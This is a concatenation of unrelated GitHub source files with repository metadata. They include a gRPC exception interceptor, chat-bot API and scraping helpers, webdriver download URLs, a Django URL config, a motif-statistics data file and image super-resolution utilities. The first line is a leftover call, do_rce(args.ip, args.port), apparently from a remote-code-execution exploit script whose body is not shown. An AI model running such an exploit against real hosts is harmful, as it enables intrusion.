do_rce(args.ip, args.port)
|
[
"noreply@github.com"
] |
ww6453.noreply@github.com
|
7a34a4fdfc88f0e171da67b11b861052b765533f
|
dc36e50bf32db3229c4e932e27cad9126451dec6
|
/interceptors.py
|
1bc83f894ecd8215092dba14e6895fb29373f27f
|
[
"Apache-2.0"
] |
permissive
|
ilyde-platform/ilyde-jobs
|
ca565b2d8f16dc0e191f66e03b49afc4473642c0
|
3b272dfe45c498f8e5cbc34a3b2be7d564885d8d
|
refs/heads/main
| 2023-05-14T14:30:47.073807
| 2021-05-28T09:47:50
| 2021-05-28T09:47:50
| 352,955,697
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,068
|
py
|
# encoding: utf-8
#
# Copyright (c) 2020-2021 Hopenly srl.
#
# This file is part of Ilyde.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
from typing import Callable, Any
from google.protobuf import any_pb2
from grpc_interceptor import ServerInterceptor
from grpc_interceptor.exceptions import GrpcException, InvalidArgument, NotFound, Unknown
import grpc
import marshmallow
import mongoengine
# setup logger
FORMAT = '%(asctime)s %(levelname)s %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
class ExceptionToStatusInterceptor(ServerInterceptor):
def intercept(
self,
method: Callable,
request: Any,
context: grpc.ServicerContext,
method_name: str,
) -> Any:
"""Override this method to implement a custom interceptor.
You should call method(request, context) to invoke the
next handler (either the RPC method implementation, or the
next interceptor in the list).
Args:
method: The next interceptor, or method implementation.
request: The RPC request, as a protobuf message.
context: The ServicerContext pass by gRPC to the service.
method_name: A string of the form
"/protobuf.package.Service/Method"
Returns:
This should generally return the result of
method(request, context), which is typically the RPC
method response, as a protobuf message. The interceptor
is free to modify this in some way, however.
"""
try:
return method(request, context)
except GrpcException as e:
context.set_code(e.status_code)
context.set_details(e.details)
logger.error(e.details)
return any_pb2.Any()
except marshmallow.ValidationError as e:
context.set_code(InvalidArgument.status_code)
msg = ' '.join(["%s: %s" % (key, str(value)) for key, value in e.messages.items()])
context.set_details(msg)
logger.error(e)
return any_pb2.Any()
except mongoengine.errors.DoesNotExist as e:
context.set_code(NotFound.status_code)
context.set_details(str(e))
logger.error(str(e))
return any_pb2.Any()
except Exception as e:
context.set_code(Unknown.status_code)
context.set_details(str(e))
logger.error(str(e))
return any_pb2.Any()
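# A hedged usage sketch (assumption; server setup is not part of this module):
# grpc.server() takes an "interceptors" argument, which is how this class is
# normally wired into whichever module builds the gRPC server.
if __name__ == "__main__":
    from concurrent import futures
    server = grpc.server(
        futures.ThreadPoolExecutor(max_workers=4),
        interceptors=[ExceptionToStatusInterceptor()],
    )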
|
[
"tony.wilson@hopenly.com"
] |
tony.wilson@hopenly.com
|
0a194bbc1f44a56f7bcabf7b470ef4d309b0de4b
|
6b629453f455ef6525a157dbc169a14484afebdc
|
/api/other_apis.py
|
8c3703b51ea93111ff117d33ffcebbaf89ea20fb
|
[
"MIT"
] |
permissive
|
ashleymeah/pinybot
|
4bbdf8c4e04fde318490e90700f59c6fe0d9bb4d
|
54bc75e894d46c09a9b6ff32644dbe07d225f4ba
|
refs/heads/master
| 2021-01-18T13:22:30.606169
| 2016-08-18T17:10:32
| 2016-08-18T17:10:32
| 65,678,969
| 2
| 0
| null | 2016-08-16T18:51:58
| 2016-08-14T17:49:36
|
Python
|
UTF-8
|
Python
| false
| false
| 15,404
|
py
|
# -*- coding: utf-8 -*-
# Provides functions to search/explore various APIs i.e. urbandictionary,
# worldweatheronline , ip-api and api.icndb & many others.
# Includes BeautifulSoup parsed APIs/websites functions.
import web_request
import unicodedata
import random
try:
from bs4 import BeautifulSoup
except ImportError:
BeautifulSoup = None
if BeautifulSoup is not None:
try:
import wikipedia # Is reliant on BeautifulSoup to be present
except ImportError:
wikipedia = None
# A storage for API keys if required; add to this dictionary if you intend to use
# more keys
API_KEYS = {'weather': ''}
def urbandictionary_search(search):
"""
Searches Urban-dictionary's API for a given search term.
:param search: The search term str to search for.
:return: definition str or None on no match or error.
"""
if str(search).strip():
urban_api_url = 'http://api.urbandictionary.com/v0/define?term=%s' % search
response = web_request.get_request(urban_api_url, json=True)
if response:
try:
definition = response['content']['list'][0]['definition']
return str(definition.encode('ascii', 'ignore'))
except KeyError:
return None
except IndexError:
return None
else:
return None
# TODO: Adjust to a new API for weather retrieval.
def weather_search(city):
"""
Searches worldweatheronline's API for weather data for a given city.
You must have a working API key to be able to use this function.
:param city: The city str to search for.
:return: weather data str or None on no match or error.
"""
if str(city).strip():
api_key = API_KEYS['weather'] # A valid API key.
if not api_key:
return False
else:
weather_api_url = 'http://api.worldweatheronline.com/free/v2/weather.ashx?' \
'q=%s&format=json&key=%s' % (city, api_key)
response = web_request.get_request(weather_api_url, json=True)
if response['content'] is not None:
try:
pressure = response['content']['data']['current_condition'][0]['pressure']
temp_c = response['content']['data']['current_condition'][0]['temp_C']
temp_f = response['content']['data']['current_condition'][0]['temp_F']
query = response['content']['data']['request'][0]['query'].encode('ascii', 'ignore')
result = query + '. Temperature: ' + temp_c + 'C (' + temp_f + 'F) Pressure: ' + pressure + ' millibars'
return result
except (IndexError, KeyError):
return None
else:
return None
def whois(ip):
"""
Searches ip-api for information about a given IP.
:param ip: The ip str to search for.
:return: information str or None on error.
"""
if str(ip).strip():
url = 'http://ip-api.com/json/%s' % ip
json_data = web_request.get_request(url, json=True)
try:
city = json_data['content']['city']
country = json_data['content']['country']
isp = json_data['content']['isp']
org = json_data['content']['org']
region = json_data['content']['regionName']
zipcode = json_data['content']['zip']
info = country + ', ' + city + ', ' + region + ', *Zipcode*: ' + zipcode + ' *ISP*: ' + isp + '/' + org
return info
except KeyError:
return None
else:
return None
# TODO: Implement categories, and character name functionality.
def chuck_norris():
"""
Finds a random Chuck Norris joke/quote from http://www.icndb.com/api/ .
    The API also has category specifications, i.e. categories are either "nerdy"/"explicit", set via the webform "?limitTo".
The character names can also be altered via passing the webform "?firstName=[name]" or "?lastName=[name]".
:return: joke str or None on failure.
"""
url = 'http://api.icndb.com/jokes/random/?escape=javascript'
json_data = web_request.get_request(url, json=True)
if json_data['content']['type'] == 'success':
joke = json_data['content']['value']['joke'].decode('string_escape')
return joke
else:
return None
def yo_mama_joke():
"""
Retrieves a random 'Yo Mama' joke from an API.
:return: joke str or None on failure.
"""
url = 'http://api.yomomma.info/'
json_data = web_request.get_request(url, json=True)
if json_data['content']:
joke = json_data['content']['joke'].decode('string_escape')
return joke
else:
return None
def online_advice():
"""
Retrieves a random string of advice from an API.
:return: advice str or None on failure.
"""
url = 'http://api.adviceslip.com/advice'
json_data = web_request.get_request(url, json=True)
if json_data['content']:
advice = json_data['content']['slip']['advice'].decode('string_escape')
return str(advice)
else:
return None
# TODO: Needs a more clearer and succinct output.
def duckduckgo_search(search):
"""
Search DuckDuckGo using their API - https://duckduckgo.com/api .
    NOTE: This is currently limited to definitions.
:param search: The search term str to search for.
:return: definition str or None on no match or error.
"""
if str(search).strip():
ddg_api = 'https://api.duckduckgo.com/?q=%s&format=json' % search
response = web_request.get_request(ddg_api, json=True)
definitions = []
if response:
# Return up to 2 definition results.
for x in range(2):
definition = response['content']['RelatedTopics'][x]['Text']
# The search word is stripped from the definition result by default.
definitions.append(definition.encode('ascii', 'ignore').strip(search))
return definitions
else:
return None
# TODO: The functions use needs to be redefined and needs to be referred to the original library.
def wiki_search(search=None):
"""
Requires Wikipedia module; pip install wikipedia.
:param search: str The search term to search for.
:return: Wikipedia summary or None if nothing found.
"""
if BeautifulSoup is not None:
if wikipedia is not None:
raise NotImplementedError('Wikipedia functionality is yet to be integrated as a function.')
# wiki_content = wikipedia.summary(search, sentences=2)
# return wiki_content
else:
return False
def omdb_search(search):
"""
Query the OMDb API - https://omdbapi.com/
:param search: Search term
:return: Title, rating, and short description
"""
if str(search).strip():
omdb_url = 'http://www.omdbapi.com/?t=%s&plot=short&r=json' % search
response = web_request.get_request(omdb_url, json=True)
if response:
try:
title = response['content']['Title']
plot = response['content']['Plot']
imdbid = response['content']['imdbID']
imdbrating = response['content']['imdbRating']
if len(plot) >= 160:
plot_parts = plot.split('.')
omdb_info = '*Title:* ' + title + '\nDetails: ' + plot_parts[0] + '\n*Rating: *' + imdbrating +\
'\n*More Info:* http://www.imdb.com/title/' + imdbid
else:
omdb_info = '*Title:* ' + title + '\n' + plot + '\n*Rating:*' + imdbrating +\
'\n*More Info:* http://www.imdb.com/title/' + imdbid
return omdb_info
except KeyError:
return None
except IndexError:
return None
else:
return None
# These APIs require the use of Requests, BeautifulSoup, urllib2 and unicodedata.
# As a result of using HTML parsers, the code maybe subject to change over time
# to adapt with the server's pages.
def time_is(location):
"""
Retrieves the time in a location by parsing the time element in the html from Time.is .
:param location: str location of the place you want to find time (works for small towns as well).
:return: time str or None on failure.
"""
if BeautifulSoup:
header = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-GB,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
'Referrer': 'http://time.is/',
}
post_url = 'http://time.is/' + str(location)
time_data = web_request.get_request(post_url, header=header)
time_html = time_data['content']
soup = BeautifulSoup(time_html, "html.parser")
time = ''
try:
for hit in soup.findAll(attrs={'id': 'twd'}):
time = hit.contents[0].strip()
except Exception:
pass
return time
else:
return None
def google_time(location):
"""
Retrieves the time in a location using Google.
:param location: str location of the place you want to find time (Location must be a large town/city/country).
:return: time str or None on failure.
"""
if BeautifulSoup is not None:
to_send = location.replace(' ', '%20')
url = 'https://www.google.co.uk/search?q=time%20in%20' + str(to_send)
raw = web_request.get_request(url)
if raw['status_code'] == 200:
raw_content = raw['content']
soup = BeautifulSoup(raw_content, 'html.parser')
raw_info = None
try:
for hit in soup.findAll(attrs={'class': 'vk_c vk_gy vk_sh card-section _MZc'}):
raw_info = hit.contents
except Exception:
pass
if raw_info is None:
return None
else:
return [str(raw_info[1].getText()), str(raw_info[5].getText())]
else:
return None
else:
return None
def top40():
"""
Retrieves the Top40 songs list from www.bbc.co.uk/radio1/chart/singles.
    :return: nested list of all songs, each entry in the format [song name, song artist].
"""
if BeautifulSoup is not None:
chart_url = "http://www.bbc.co.uk/radio1/chart/singles"
raw = web_request.get_request(url=chart_url)
html = raw['content']
soup = BeautifulSoup(html, "html.parser")
raw_titles = soup.findAll("div", {"class": "cht-entry-title"})
raw_artists = soup.findAll("div", {"class": "cht-entry-artist"})
all_titles = []
all_artists = []
for x in xrange(len(raw_titles)):
individual_title = unicodedata.normalize('NFKD', raw_titles[x].getText()).encode('ascii', 'ignore')
all_titles.append(individual_title)
for x in xrange(len(raw_artists)):
individual_artist = unicodedata.normalize('NFKD', raw_artists[x].getText()).encode('ascii', 'ignore')
individual_artist = individual_artist.lstrip()
individual_artist = individual_artist.rstrip()
all_artists.append(individual_artist)
songs = []
for x in xrange(len(all_titles)):
songs.append([all_titles[x], all_artists[x]])
if len(songs) > 0:
return songs
else:
return None
else:
return None
tags = ['age', 'alcohol', 'animal', 'attitude', 'beauty', 'black', 'blonde', 'car', 'communication',
'dirty', 'doctor', 'drug', 'family', 'fat', 'fighting', 'flirty', 'food', 'friendship', 'happiness',
'health', 'insults', 'intelligence', 'IT', 'kids', 'life', 'love', 'marriage', 'men', 'mistake', 'money',
'motivational', 'motorcycle', 'new', 'people', 'political', 'puns', 'retirement', 'rude', 'sarcastic',
'sex', 'school', 'sport', 'stupid', 'success', 'time', 'travel', 'women', 'work']
def one_liners(tag=None):
"""
Retrieves a one-liner from http://onelinefun.com/ (by choosing a random category).
:param tag: str a specific tag name from which you want to choose a
joke from.
:return: joke: str a one line joke/statement (depending on category).
"""
if BeautifulSoup is not None:
url = "http://onelinefun.com/"
if tag:
joke_url = url + str(tag) + "/"
else:
global tags
# Select a random tag from the list if one has not been provided
joke_tag = random.randint(0, len(tags) - 1)
joke_url = url + tags[joke_tag] + "/"
raw = web_request.get_request(url=joke_url)
if raw['status_code'] == 200:
html = raw['content']
soup = BeautifulSoup(html, "html.parser")
jokes = soup.findAll("p")
if jokes:
all_jokes = []
for x in xrange(len(jokes)):
individual_joke = unicodedata.normalize('NFKD', jokes[x].getText()).encode('ascii', 'ignore')
all_jokes.append(individual_joke)
                if len(all_jokes) != 0:
del all_jokes[0]
for x in range(6):
del all_jokes[len(all_jokes) - 1]
joke = str(all_jokes[random.randint(0, len(all_jokes) - 1)])
return joke
else:
return None
else:
return None
else:
return None
else:
return None
def etymonline(search):
"""
Searches the etymology of words/phrases using the Etymonline website.
:param search: str the word/phrase you want to search for.
:return: dict the results from the search.
"""
if BeautifulSoup is not None:
url = 'http://etymonline.com/index.php?term=%s&allowed_in_frame=0'
search_parts = search.split(' ')
search_term = '+'.join(search_parts)
post_url = url % search_term
raw = web_request.get_request(url=post_url)
if raw['status_code'] == 200:
html = raw['content']
soup = BeautifulSoup(html, "html.parser")
quotes = soup.findAll("dd", {"class": "highlight"})
# There are several quotes/term results returned, we only want
# the first one, alternatively a loop can be setup.
# Represent the tags as a string, since we do not have specific identification.
# Unicode characters in this process will be represented as their respective values.
quote = quotes[0].getText()
quotes = quote.split('\r\n\r\n')
# There are more than one set of quotes parsed, you may iterate over this too in order to return a
# greater set of results.
return u"" + quotes[0] # Result is returned in unicode.
else:
return None
else:
return None
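# A minimal usage sketch (assumption: run as a script with network access).
# Every helper above returns a str/list on success and None (or False) on failure,
# so callers should check the result before using it.
if __name__ == '__main__':
    definition = urbandictionary_search('python')
    if definition is not None:
        print(definition)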
|
[
"goelmolel@hotmail.com"
] |
goelmolel@hotmail.com
|
8ee5db8601d04ac50e9dad4014de6eb39977675b
|
ea0943075aa088a97c012d5f8a2039eb6c2238ee
|
/webdriver_manager/config.py
|
cd768f7cc0941d8f00c650e5dcb70fc5a85d6e17
|
[
"MIT"
] |
permissive
|
golemhq/webdriver-manager
|
16efde8e8901a7f302251a9d786b9999327e75ab
|
0e72ef1e4c882989fd78cd50b9e46a4503e5fac5
|
refs/heads/master
| 2023-04-06T15:23:15.818404
| 2021-04-13T02:16:49
| 2021-04-13T02:16:49
| 117,376,091
| 5
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 434
|
py
|
ALL_DRIVERS = ['chromedriver', 'geckodriver']
DEFAULT_DRIVERS = ['chromedriver', 'geckodriver']
CHROMEDRIVER_STORAGE_URL = 'https://chromedriver.storage.googleapis.com'
CHROMEDRIVER_LATEST_FILE = 'https://chromedriver.storage.googleapis.com/LATEST_RELEASE'
GECKODRIVER_LASTEST_URL = 'https://api.github.com/repos/mozilla/geckodriver/releases/latest'
GECKODRIVER_URL_BASE = 'https://github.com/mozilla/geckodriver/releases/download'
|
[
"feo.luciano@gmail.com"
] |
feo.luciano@gmail.com
|
c60786012e3320cf0da9a0a1a2d75376c66b34b1
|
f9b90e0c103e0b5297b9ec142341bce24e8e6372
|
/djangoProject/urls.py
|
507edec3e889aaedfed881fae8f2311e6c2891da
|
[] |
no_license
|
VaultBoee/test_rep
|
106b43a0ee7bf99692c3128490a0df6d2721c3bb
|
aa71e9681e05c3daa500c02d1090c9dce2f06fe0
|
refs/heads/main
| 2023-05-15T10:02:53.534653
| 2021-05-29T01:01:23
| 2021-05-29T01:01:23
| 371,848,724
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 811
|
py
|
"""djangoProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
urlpatterns = [
path('admin/', admin.site.urls),
path('test_model/', include('main.urls')),
]
|
[
"vaultboee@gmail.com"
] |
vaultboee@gmail.com
|
a75dcb96bfd05a6f1298857cfa6c5d2702865b08
|
010c50a5fb86a6f2a86f78cafd46641e2cdeb10c
|
/CityMotif/Document/筛选.py
|
947219c3c74c47e64fbda48a2c9996bb8b646438
|
[] |
no_license
|
Qi-Sun/SuzhouProjects
|
d4fca26fa2b0549b9509506cfb6df5690702887e
|
6a88c54d781d2a121d21411a4ba6d3af9ab60124
|
refs/heads/master
| 2020-03-11T13:05:34.185692
| 2018-07-06T04:40:29
| 2018-07-06T04:40:29
| 130,015,060
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,414
|
py
|
--------------3---------------
{'gID': 78, 'freq': 784424.0, 'ave_rand_freq': 821466.94, 'conc': 0.40653, 'ave_rand_conc': 0.42993, 'f-ZScore': -0.16, 'f-pValue': 0.917, 'c-ZScore': -0.43, 'c-pValue': 0.924}
{'gID': 98, 'freq': 1881.0, 'ave_rand_freq': 1657.67, 'conc': 0.00097, 'ave_rand_conc': 0.00092, 'f-ZScore': 0.49, 'f-pValue': 0.047, 'c-ZScore': 0.29, 'c-pValue': 0.066}
--------------3---------------
--------------4---------------
{'gID': 4382, 'freq': 27806873.0, 'ave_rand_freq': 31388613.66, 'conc': 0.16296, 'ave_rand_conc': 0.17586, 'f-ZScore': -0.66, 'f-pValue': 0.971, 'c-ZScore': -0.44, 'c-pValue': 0.974}
{'gID': 4426, 'freq': 136231.0, 'ave_rand_freq': 135636.46, 'conc': 0.0008, 'ave_rand_conc': 0.00077, 'f-ZScore': 0.03, 'f-pValue': 0.816, 'c-ZScore': 0.37, 'c-pValue': 0.057}
{'gID': 4698, 'freq': 5693346.0, 'ave_rand_freq': 7452384.15, 'conc': 0.03336, 'ave_rand_conc': 0.04423, 'f-ZScore': -1.37, 'f-pValue': 0.973, 'c-ZScore': -0.35, 'c-pValue': 0.998}
{'gID': 4740, 'freq': 4508.0, 'ave_rand_freq': 5643.1, 'conc': 3e-05, 'ave_rand_conc': 3e-05, 'f-ZScore': -1.19, 'f-pValue': 0.97, 'c-ZScore': -0.75, 'c-pValue': 0.996}
--------------4---------------
--------------5---------------
{'gID': 1082522, 'freq': 2741562.0, 'ave_rand_freq': 2810030.85, 'conc': 0.00022, 'ave_rand_conc': 0.000217, 'f-ZScore': -0.14, 'f-pValue': 0.96, 'c-ZScore': 0.1, 'c-pValue': 0.24}
{'gID': 1083668, 'freq': 278277.0, 'ave_rand_freq': 358584.97, 'conc': 2.2e-05, 'ave_rand_conc': 2.8e-05, 'f-ZScore': -1.33, 'f-pValue': 0.97, 'c-ZScore': -1.5, 'c-pValue': 1.0}
{'gID': 1083794, 'freq': 1442669.0, 'ave_rand_freq': 1412315.15, 'conc': 0.000116, 'ave_rand_conc': 0.00011, 'f-ZScore': 0.13, 'f-pValue': 0.51, 'c-ZScore': 0.38, 'c-pValue': 0.12}
{'gID': 1090054, 'freq': 8531.0, 'ave_rand_freq': 7054.47, 'conc': 1e-06, 'ave_rand_conc': 1e-06, 'f-ZScore': 1.16, 'f-pValue': 0.05, 'c-ZScore': 2.2, 'c-pValue': 0.03}
{'gID': 1122482, 'freq': 1109927.0, 'ave_rand_freq': 1148057.84, 'conc': 8.9e-05, 'ave_rand_conc': 9e-05, 'f-ZScore': -0.2, 'f-pValue': 0.94, 'c-ZScore': -0.05, 'c-pValue': 0.28}
{'gID': 1122820, 'freq': 11435.0, 'ave_rand_freq': 15702.21, 'conc': 1e-06, 'ave_rand_conc': 1e-06, 'f-ZScore': -1.59, 'f-pValue': 0.97, 'c-ZScore': -1.3, 'c-pValue': 1.0}
--------------5---------------
First, the preset z and p thresholds were obtained from the three-node travel-behaviour statistics:
z > 0.40653
p < 0.1
(used when the two p values deviate strongly from each other)
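# A hedged sketch of that selection rule (assumptions: "motifs" is a hypothetical list
# holding the dicts pasted above, and it is unclear whether "z" maps to the 'conc'
# field or to the Z-score fields):
#   selected = [m for m in motifs
#               if m['conc'] > 0.40653 and m['f-pValue'] < 0.1 and m['c-pValue'] < 0.1]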
|
[
"qisun13@pku.edu.cn"
] |
qisun13@pku.edu.cn
|
b719bab964c3d9886777b054c8dfa8c94cf39888
|
448b5ced3ff3a7164731404e517ebddd95a195e8
|
/Resnet_tl/utils2.py
|
fcbd091cf4b461aab94ed40ddd8451e60df77e69
|
[] |
no_license
|
xkinghust/Benchmark_EPS
|
032d512eff5bff0fce81d3e8afee20880b44a060
|
697a44faa6c1c8ee88dfacb8e1723fcd30eba613
|
refs/heads/master
| 2020-07-10T13:47:14.826717
| 2019-06-19T10:00:20
| 2019-06-19T10:00:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 19,240
|
py
|
# coding=utf8
"""
Deeply-Recursive Convolutional Network for Image Super-Resolution
Paper: http://www.cv-foundation.org/openaccess/content_cvpr_2016/html/Kim_Deeply-Recursive_Convolutional_Network_CVPR_2016_paper.html
Test implementation utility
Author: Jin Yamanaka
"""
from __future__ import division
import datetime
import math
import os
import shutil
from os import listdir
from os.path import isfile, join
import numpy as np
import tensorflow as tf
from PIL import Image
from scipy import misc
# utilities for save / load
test_datasets = {
"set5": ["Set5", 0, 5],
"set14": ["Set14", 0, 14],
"bsd100": ["BSD100_SR", 0, 100],
"urban100": ["Urban100_SR", 0, 100],
"test": ["Set5", 0, 1]
}
class LoadError(Exception):
def __init__(self, message):
self.message = message
def make_dir(directory):
if not os.path.exists(directory):
os.makedirs(directory)
def get_files_in_directory(path):
file_list = [path + f for f in listdir(path) if isfile(join(path, f))]
return file_list
def remove_generic(path, __func__):
try:
__func__(path)
except OSError as error:
print("OS error: {0}".format(error))
def clean_dir(path):
if not os.path.isdir(path):
return
files = os.listdir(path)
for x in files:
full_path = os.path.join(path, x)
if os.path.isfile(full_path):
f = os.remove
remove_generic(full_path, f)
elif os.path.isdir(full_path):
clean_dir(full_path)
f = os.rmdir
remove_generic(full_path, f)
def save_image(filename, image):
if len(image.shape) >= 3 and image.shape[2] == 1:
image = image.reshape(image.shape[0], image.shape[1])
directory = os.path.dirname(filename)
if directory != "" and not os.path.exists(directory):
os.makedirs(directory)
image = misc.toimage(image, cmin=0, cmax=255) # to avoid range rescaling
misc.imsave(filename, image)
print("Saved [%s]" % filename)
def save_image_data(filename, image):
directory = os.path.dirname(filename)
if directory != "" and not os.path.exists(directory):
os.makedirs(directory)
np.save(filename, image)
print("Saved [%s]" % filename)
if len(image.shape) == 3 and image.shape[2] == 1:
image = image.reshape(image.shape[0], image.shape[1])
misc.imsave(filename, image)
def convert_rgb_to_y(image, jpeg_mode=True, max_value=255.0):
if len(image.shape) <= 2 or image.shape[2] == 1:
return image
if jpeg_mode:
xform = np.array([[0.299, 0.587, 0.114]])
y_image = image.dot(xform.T)
else:
xform = np.array([[65.481 / 256.0, 128.553 / 256.0, 24.966 / 256.0]])
y_image = image.dot(xform.T) + (16.0 * max_value / 256.0)
return y_image
def convert_rgb_to_ycbcr(image, jpeg_mode=True, max_value=255):
if len(image.shape) < 2 or image.shape[2] == 1:
return image
if jpeg_mode:
xform = np.array([[0.299, 0.587, 0.114], [-0.169, - 0.331, 0.500], [0.500, - 0.419, - 0.081]])
ycbcr_image = image.dot(xform.T)
ycbcr_image[:, :, [1, 2]] += max_value / 2
else:
xform = np.array(
[[65.481 / 256.0, 128.553 / 256.0, 24.966 / 256.0], [- 37.945 / 256.0, - 74.494 / 256.0, 112.439 / 256.0],
[112.439 / 256.0, - 94.154 / 256.0, - 18.285 / 256.0]])
ycbcr_image = image.dot(xform.T)
ycbcr_image[:, :, 0] += (16.0 * max_value / 256.0)
ycbcr_image[:, :, [1, 2]] += (128.0 * max_value / 256.0)
return ycbcr_image
def convert_y_and_cbcr_to_rgb(y_image, cbcr_image, jpeg_mode=True, max_value=255.0):
if len(y_image.shape) <= 2:
        y_image = y_image.reshape(y_image.shape[0], y_image.shape[1], 1)
if len(y_image.shape) == 3 and y_image.shape[2] == 3:
y_image = y_image[:, :, 0:1]
ycbcr_image = np.zeros([y_image.shape[0], y_image.shape[1], 3])
ycbcr_image[:, :, 0] = y_image[:, :, 0]
ycbcr_image[:, :, 1:3] = cbcr_image[:, :, 0:2]
return convert_ycbcr_to_rgb(ycbcr_image, jpeg_mode=jpeg_mode, max_value=max_value)
def convert_ycbcr_to_rgb(ycbcr_image, jpeg_mode=True, max_value=255.0):
rgb_image = np.zeros([ycbcr_image.shape[0], ycbcr_image.shape[1], 3]) # type: np.ndarray
if jpeg_mode:
rgb_image[:, :, [1, 2]] = ycbcr_image[:, :, [1, 2]] - (128.0 * max_value / 256.0)
xform = np.array([[1, 0, 1.402], [1, - 0.344, - 0.714], [1, 1.772, 0]])
rgb_image = rgb_image.dot(xform.T)
else:
rgb_image[:, :, 0] = ycbcr_image[:, :, 0] - (16.0 * max_value / 256.0)
rgb_image[:, :, [1, 2]] = ycbcr_image[:, :, [1, 2]] - (128.0 * max_value / 256.0)
xform = np.array(
[[max_value / 219.0, 0, max_value * 0.701 / 112.0],
[max_value / 219, - max_value * 0.886 * 0.114 / (112 * 0.587), - max_value * 0.701 * 0.299 / (112 * 0.587)],
[max_value / 219.0, max_value * 0.886 / 112.0, 0]])
rgb_image = rgb_image.dot(xform.T)
return rgb_image
def set_image_alignment(image, alignment):
alignment = int(alignment) # I don't like this...
width, height = image.shape[1], image.shape[0]
width = (width // alignment) * alignment
height = (height // alignment) * alignment
if image.shape[1] != width or image.shape[0] != height:
return image[:height, :width, :]
return image
def resize_image_by_bicubic(image, scale):
size = [int(image.shape[0] * scale), int(image.shape[1] * scale)]
image = image.reshape(1, image.shape[0], image.shape[1], image.shape[2])
tf_image = tf.image.resize_bicubic(image, size=size)
image = tf_image.eval()
return image.reshape(image.shape[1], image.shape[2], image.shape[3])
def resize_image_by_pil_bicubic(image, scale):
width, height = image.shape[1], image.shape[0]
new_width = int(width * scale)
new_height = int(height * scale)
if len(image.shape) == 3 and image.shape[2] == 3:
image = Image.fromarray(image, "RGB")
image = image.resize([new_width, new_height], resample=Image.BICUBIC)
image = np.asarray(image)
else:
image = Image.fromarray(image.reshape(height, width))
image = image.resize([new_width, new_height], resample=Image.BICUBIC)
image = np.asarray(image)
image = image.reshape(new_height, new_width, 1)
return image
def load_image(filename, width=0, height=0, channels=0, alignment=0):
if not os.path.isfile(filename):
raise LoadError("File not found")
image = misc.imread(filename)
if len(image.shape) == 2:
image = image.reshape(image.shape[0], image.shape[1], 1)
if (width != 0 and image.shape[1] != width) or (height != 0 and image.shape[0] != height):
raise LoadError("Attributes mismatch")
if channels != 0 and image.shape[2] != channels:
raise LoadError("Attributes mismatch")
if alignment != 0 and ((width % alignment) != 0 or (height % alignment) != 0):
raise LoadError("Attributes mismatch")
print("Loaded [%s]: %d x %d x %d" % (filename, image.shape[1], image.shape[0], image.shape[2]))
return image
def load_image_data(filename, width=0, height=0, channels=0, alignment=0):
if not os.path.isfile(filename + ".npy"):
raise LoadError("File not found")
image = np.load(filename + ".npy")
if (width != 0 and image.shape[1] != width) or (height != 0 and image.shape[0] != height):
raise LoadError("Attributes mismatch")
if channels != 0 and image.shape[2] != channels:
raise LoadError("Attributes mismatch")
if alignment != 0 and ((width % alignment) != 0 or (height % alignment) != 0):
raise LoadError("Attributes mismatch")
print("Cache Loaded [%s]: %d x %d x %d" % (filename, image.shape[1], image.shape[0], image.shape[2]))
return image
def load_input_image(filename, width=0, height=0, channels=1, scale=1, alignment=0,
convert_ycbcr=True, jpeg_mode=False, rescale=True):
image = load_image(filename)
return build_input_image(image, width, height, channels, scale, alignment,
convert_ycbcr, jpeg_mode, rescale)
def build_input_image(image, width=0, height=0, channels=1, scale=1, alignment=0,
convert_ycbcr=True, jpeg_mode=False, rescale=True):
if width != 0 and height != 0:
if image.shape[0] != height or image.shape[1] != width:
x = (image.shape[1] - width) // 2
y = (image.shape[0] - height) // 2
image = image[y: y + height, x: x + width, :]
if alignment > 1:
image = set_image_alignment(image, alignment)
if scale != 1:
image = resize_image_by_pil_bicubic(image, 1.0 / scale)
if rescale:
image = resize_image_by_pil_bicubic(image, scale)
if convert_ycbcr:
image = convert_rgb_to_ycbcr(image, jpeg_mode=jpeg_mode)
if channels == 1 and image.shape[2] > 1:
image = image[:, :, 0:1].copy() # use copy() since after the step we use stride_tricks.as_strided().
return image
def load_input_image_with_cache(cache_dir, org_filename, channels=1, scale=1, alignment=0,
convert_ycbcr=True, jpeg_mode=False, rescale=True):
    if cache_dir is None or cache_dir == "":
return load_input_image(org_filename, channels=channels, scale=scale, alignment=alignment,
convert_ycbcr=convert_ycbcr, jpeg_mode=jpeg_mode, rescale=rescale)
filename, extension = os.path.splitext(org_filename)
if filename.startswith("../"):
filename = filename[len("../"):]
if scale != 1.0:
filename += "_%1.0f" % scale
if channels == 1:
filename += "_Y"
cache_filename = cache_dir + "/" + filename + extension
try:
image = load_image(cache_filename, channels=channels)
except LoadError:
image = load_input_image(org_filename, channels=channels, scale=scale, alignment=alignment,
convert_ycbcr=convert_ycbcr, jpeg_mode=jpeg_mode, rescale=rescale)
save_image(cache_filename, image)
return image
def get_split_images(image, window_size, stride=None):
    height, width, channels = image.shape
    if stride is None:
        stride = window_size  # default to non-overlapping windows
    new_height = 1 + (height - window_size) // stride
    new_width = 1 + (width - window_size) // stride
